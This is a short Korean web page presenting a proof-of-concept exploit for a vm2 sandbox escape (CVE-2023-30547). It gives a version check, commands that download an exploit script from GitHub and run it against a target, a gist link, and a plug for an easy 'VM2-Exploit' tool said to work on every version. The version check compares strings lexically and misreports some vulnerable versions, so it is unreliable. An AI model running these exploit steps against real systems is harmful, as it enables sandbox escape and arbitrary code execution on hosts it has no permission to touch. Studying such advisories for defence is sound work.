
PoC Exploit for VM2 Sandbox Escape Vulnerability
VM2 샌드박스 탈출 취약점 PoC 익스플로잇
대체 이미지
vm2 < 3.9.17은 예외 처리 과정의 결함으로 인해 임의 코드 실행에 취약합니다. 공격자는 handleException() 내에서 정제되지 않은 호스트 예외를 트리거하여 샌드박스를 탈출하고 호스트 컨텍스트에서 임의의 코드를 실행할 수 있습니다.
⚠️ "VM2-Exploit" 도구 사용을 고려해보세요. 이 도구는 VM2의 모든 버전을 대상으로 사용할 수 있으며 사용하기 쉽습니다.
샌드박스에서 다음 명령을 실행하여 대상이 취약한지 확인하세요.
const version = require("vm2/package.json").version;
if (version < "3.9.17") {
console.log("vulnerable!");
} else {
console.log("not vulnerable");
}
git clone https://github.com/rvizx/CVE-2023-30547
cd CVE-2023-30547
python3 exploit.py
또는
wget https://raw.githubusercontent.com/rvizx/CVE-2023-30547/main/exploit.py
python3 exploit.py
https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
Xion (SeungHyun Lee) 의 KAIST Hacking Lab